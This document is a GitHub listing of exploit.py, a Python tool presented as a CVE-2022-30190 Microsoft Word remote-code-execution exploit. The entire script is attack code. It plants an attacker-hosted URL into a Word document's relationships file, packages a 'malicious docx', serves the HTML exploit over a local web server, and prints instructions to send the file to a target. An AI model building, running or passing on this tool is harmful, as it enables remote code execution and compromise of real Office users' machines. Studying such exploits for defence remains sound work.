-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathexploit.py
101 lines (76 loc) · 2.17 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
#!/usr/bin/env python3
import sys
import os
import subprocess
HOST_DIR = 'srv/'
def usage():
print('[%] Usage: ' + str(sys.argv[0]) + ' <generate/host> <options>')
print('[i] Example: ' + str(sys.argv[0]) + ' generate http://192.168.1.41')
print('[i] Example: sudo ' + str(sys.argv[0]) + ' host 80')
exit()
def check_usage():
ret = 0
if(len(sys.argv) < 2):
usage()
if(sys.argv[1] == 'generate'):
if(len(sys.argv) != 3):
usage()
ret = 1
elif(sys.argv[1] == 'host'):
if(len(sys.argv) != 3):
usage()
ret = 2
else:
usage()
return ret
def execute_cmd(cmd):
r = subprocess.getoutput(cmd)
return r
def generate_payload():
srv_url = sys.argv[2]
print('\n[ == Options == ]')
print('\t[ HTML Exploit URL: ' + str(srv_url))
print('')
execute_cmd('cp -r data/word_dat/ data/tmp_doc/')
print('[*] Writing HTML Server URL...')
rels_pr = open('data/tmp_doc/word/_rels/document.xml.rels', 'r')
xml_content = rels_pr.read()
rels_pr.close()
xml_content = xml_content.replace('<EXPLOIT_HOST_HERE>', srv_url + '/word.html')
rels_pw = open('data/tmp_doc/word/_rels/document.xml.rels', 'w')
rels_pw.write(xml_content)
rels_pw.close()
print('[*] Generating malicious docx file...')
os.chdir('data/tmp_doc/')
os.system('zip -r document.docx *')
execute_cmd('cp document.docx ../../out/document.docx')
os.chdir('../')
execute_cmd('rm -R tmp_doc/')
os.chdir('../')
print('[*] Updating information on HTML exploit...')
os.chdir('srv/')
execute_cmd('cp backup.html word.html')
print('[+] Malicious Word Document payload generated at: out/document.docx')
print('[i] You can execute now the server and then send document.docx to target')
return
def start_server():
os.chdir(HOST_DIR)
try:
port = int(sys.argv[2])
except:
print('[-] Invalid port specified!')
exit()
os.system('python3 -m http.server ' + str(port))
return
if __name__ == '__main__':
print('[%] CVE-2022-30190 - MS Office Word RCE Exploit [%]')
r = check_usage()
if(r == 1):
print('[*] Option is generate a malicious payload...')
generate_payload()
elif(r == 2):
print('[*] Option is host HTML Exploit...')
start_server()
else:
print('[-] Unknown error')
exit()